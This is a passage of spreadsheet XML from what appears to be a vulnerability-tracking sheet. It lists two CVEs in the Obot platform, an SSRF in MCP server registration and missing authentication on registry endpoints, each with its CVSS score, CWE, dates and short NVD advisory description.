          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Obot before v0.23.0 contains a server-side request forgery vulnerability in remote MCP server registration that allows privileged users to specify arbitrary URLs without destination validation. Attackers with Power User or higher roles can coerce Obot to make requests to internal services and cloud metadata endpoints, reading responses in error messages to disclose sensitive credentials.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101064</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.9)</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101063</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Obot versions before v0.23.0 fail to enforce authentication on MCP Registry endpoints under /v0.1/* when registry authentication is enabled. Unauthenticated attackers can read registry metadata including server names, descriptions, repository URLs, and connect URLs by sending GET requests to /v0.1/servers.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101063</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T92"/>
  <conditionalFormatting sqref="E2:E92">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92">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2026-09-29T06:16:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-29T06:16:28Z</dcterms:modified>
</cp:coreProperties>
</file>